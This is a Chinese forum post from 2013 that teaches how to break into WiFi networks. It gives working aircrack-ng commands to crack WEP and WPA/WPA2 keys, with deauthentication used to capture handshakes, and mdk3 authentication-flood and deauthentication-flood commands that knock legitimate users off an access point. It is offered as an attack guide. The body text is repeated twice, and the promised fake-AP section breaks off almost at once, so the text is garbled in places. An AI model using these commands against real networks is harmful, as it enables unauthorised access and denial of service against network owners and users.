edit_note帖子
1,551
stars积分
20,071
event加入
2011-05-19
怀旧国机
教你怎样利用伪造的AP拿到 WiFi密码
schedule发表于 2013-03-18 13:04:00
visibility查看 499
chat_bubble回复 3
#1 楼主
00×01 介绍
不管使用什么系统,一定要把网卡激
活成为monitor模式,这样软件才可
以
识别
iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0
网
卡
airmon-ng start wlan0 //将网卡激
活
成monitor模式,一般为mon0
WEP
airodump-ng --ivs –w log –c频道
wlan0 //wep用ivs过滤报文即可,速
度
快
aireplay-ng -3 –b bssid –h
clientMac mon0 //采用
ARPRequesr
来迅速加大数据量
aircrack-ng ivs文件 //破解捕获来
的
ivs文件 wep用这几个命令足以了
WPA/WPA2
airodump-ng –c频道–w log
mon0 //
wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c
clientMAC wlan0 //发动Deauth攻
击
获取完整的handshake 提示获取成
功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的
cap
文件 //WPA破解完全靠字典,需要有
耐心
其实说到这里,hash破解速录会大大
提升,只是利用字典制作hash table
的
时候需要花好长的时间,但是破解是
aircrack的几十倍.
常见的几种DOS攻击:
Authentication Flood、
Deauthentication Flood、
Disassociation Flood、RF
Jamming、Association Flood等
00×02 利用工具
本次我们还是依赖于BT5下一款强
大
的工具,mdk3
现在大部分无线下的工具都是利用
mdk3为基本内核来开发的,所以其
性
能就不用多说了.
针对路由器,我们可以发动
Authentication Flood,mdk3下参
数为
a,此攻击是针对无线AP的洪水攻击,
又叫做身份验证攻击.其原理就是向
AP发动大量的虚假的链接请求,这
种
请求数量一旦超过了无线AP所能承
受的范围,
AP就会自动断开现有链接,使合法
用
户无法使用无线网络
mdk3 mon0 a –a AP的MAC地址
(BSSID)
可以看到发动的同时,有大量虚假的
客户端对AP进行连接,这些client
MAC地址也都是随机伪造的
a
此时我们可以通过-c来对指定的频
道
进行攻击,-a固定bssid进行攻击,-s控
制发包速率.一般默认的是200个包/
秒,
这样我们持续的攻击下去,无线网络
在几分钟之内就会瘫痪,但是问题是,
如果我们遇到一个能承载大量用户
的
AP客户端,那么我们该怎么办呢?
别急,下面我们就来使用当初我们获
得handshake时候使用过的
Deauthentication Flood,
记得么,当初我们使用aireplay-ng-0
来发动使其断线来获取握手包,其实
aireplay-ng即可发动,只要不控制
发
包数量,并随机频道即可,但是相比
mdk3效率并不高.
这种攻击不是针对AP的,而是针对
于
client MAC.
mdk3 mon0 d
攻击开始了
可以看到,我的网络瞬间断断续续,当
我停止后,网络恢复
此时我们可以利用-s参数来加快发
包
速率.这种效率是非常高的,一般发
动
开始,client便开始断网.
另外我们可以使用-w(白名单) –b
(黑
名单)来添加我们的mac地址,这样
我
们就可以使自己伪造的AP永远的不
受自己的攻击所影响,
而黑白名单可以写单独的一个mac
也
可以写文件的绝对路径,然后把要加
入名单的mac写在文件里.
伪造AP
首先我们需要一块支持AP的无线网
卡,或者直接上无线路由器,或者做热
点,做ap方法网上很多很多,
这个大家可以自己找下.
不管使用什么系统,一定要把网卡激
活成为monitor模式,这样软件才可
以
识别
iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0
网
卡
airmon-ng start wlan0 //将网卡激
活
成monitor模式,一般为mon0
WEP
airodump-ng --ivs –w log –c频道
wlan0 //wep用ivs过滤报文即可,速
度
快
aireplay-ng -3 –b bssid –h
clientMac mon0 //采用
ARPRequesr
来迅速加大数据量
aircrack-ng ivs文件 //破解捕获来
的
ivs文件 wep用这几个命令足以了
WPA/WPA2
airodump-ng –c频道–w log
mon0 //
wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c
clientMAC wlan0 //发动Deauth攻
击
获取完整的handshake 提示获取成
功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的
cap
文件 //WPA破解完全靠字典,需要有
耐心
其实说到这里,hash破解速录会大大
提升,只是利用字典制作hash table
的
时候需要花好长的时间,但是破解是
aircrack的几十倍.
常见的几种DOS攻击:
Authentication Flood、
Deauthentication Flood、
Disassociation Flood、RF
Jamming、Association Flood等
00×02 利用工具
本次我们还是依赖于BT5下一款强
大
的工具,mdk3
现在大部分无线下的工具都是利用
mdk3为基本内核来开发的,所以其
性
能就不用多说了.
针对路由器,我们可以发动
Authentication Flood,mdk3下参
数为
a,此攻击是针对无线AP的洪水攻击,
又叫做身份验证攻击.其原理就是向
AP发动大量的虚假的链接请求,这
种
请求数量一旦超过了无线AP所能承
受的范围,
AP就会自动断开现有链接,使合法
用
户无法使用无线网络
mdk3 mon0 a –a AP的MAC地址
(BSSID)
可以看到发动的同时,有大量虚假的
客户端对AP进行连接,这些client
MAC地址也都是随机伪造的
a
此时我们可以通过-c来对指定的频
道
进行攻击,-a固定bssid进行攻击,-s控
制发包速率.一般默认的是200个包/
秒,
这样我们持续的攻击下去,无线网络
在几分钟之内就会瘫痪,但是问题是,
如果我们遇到一个能承载大量用户
的
AP客户端,那么我们该怎么办呢?
别急,下面我们就来使用当初我们获
得handshake时候使用过的
Deauthentication Flood,
记得么,当初我们使用aireplay-ng-0
来发动使其断线来获取握手包,其实
aireplay-ng即可发动,只要不控制
发
包数量,并随机频道即可,但是相比
mdk3效率并不高.
这种攻击不是针对AP的,而是针对
于
client MAC.
mdk3 mon0 d
攻击开始了
可以看到,我的网络瞬间断断续续,当
我停止后,网络恢复
此时我们可以利用-s参数来加快发
包
速率.这种效率是非常高的,一般发
动
开始,client便开始断网.
另外我们可以使用-w(白名单) –b
(黑
名单)来添加我们的mac地址,这样
我
们就可以使自己伪造的AP永远的不
受自己的攻击所影响,
而黑白名单可以写单独的一个mac
也
可以写文件的绝对路径,然后把要加
入名单的mac写在文件里.
伪造AP
首先我们需要一块支持AP的无线网
卡,或者直接上无线路由器,或者做热
点,做ap方法网上很多很多,
这个大家可以自己找下.
全部回复 (3)
2013-03-18 13:14:00
沙发
n支持楼主
2013-03-18 13:23:00
板凳
可以?
2013-03-18 14:34:00
地板
不懂
登录 后才能回复
flag举报帖子